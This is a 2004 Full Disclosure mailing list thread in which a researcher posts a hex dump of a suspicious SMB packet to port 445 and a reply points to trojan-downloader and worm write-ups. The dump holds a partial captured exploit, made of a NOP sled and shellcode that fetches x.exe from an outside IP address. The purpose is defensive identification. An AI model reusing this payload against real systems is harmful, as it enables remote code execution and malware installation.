Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Is this a new Trojan?

From: Harlan Carvey <keydet89 () yahoo com>
Date: Tue, 31 Aug 2004 16:35:04 -0700 (PDT)
If you don't have access to the source machine, then
maybe take a look here...
http://www.pestpatrol.com/pestinfo/t/trojandownloader_win32_delf.asp

...or maybe here...
http://www.pestpatrol.com/pestinfo/w/worm_p2p_surnova.asp

without more info (rest of packet, openports output,
etc)...

--- Sumeet SINGH <susingh () cs ucsd edu> wrote:


hi,

We've been seeing a large number of copies of a TCP
packet to port 445,
that includes the following portion that we have not
seen before:

00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8 
.....SMB%.......
00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04 
................
00 08 60 00 10 00 00 a0 0c 00 00 00 04 00 00 00 
..`.............
00 00 00 00 00 00 00 00 00 54 00 a0 0c 54 00 02 
.........T...T..
00 26 00 00 40 b1 0c 10 5c 00 50 00 49 00 50 00 
.&..@...\.P.I.P.
45 00 5c 00 00 00 00 00 05 00 00 03 10 00 00 00 
E.\.............
a0 0c 00 00 01 00 00 00 88 0c 00 00 00 00 09 00 
................
ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 
................
90 90 90 90 90 90 90 90 90 90 90 90 eb 58 68 74 
.............Xht
74 70 3a 2f 2f 32 30 32 2e 31 2e 32 30 30 2e 31 
tp://202.1.200.1
39 3a 32 34 34 36 2f 78 2e 65 78 65 df df df df 
9:2446/x.exe....
df df df df df df df df df 4d 6f 7a 69 6c 6c 61 
.........Mozilla
2f 34 2e 30 df 5d 33 c9 66 b9 ee 01 8d 75 05 8b 
/4.0.]3.f....u..
fe 8a 06 3c 99 75 05 46 8a 06 2c 30 46 34 99 88 
.....u.F..,0F4..

(the remainder of the packet has been removed)

Has anyone seen this before?
The IP address (202.1.200.19) is unreachable.

Is this an old exploit (worm/bot) that just took its
time to come around
to us?

-- sumeet
PhD. Student
UCSD

_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.netsys.com/full-disclosure-charter.html



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: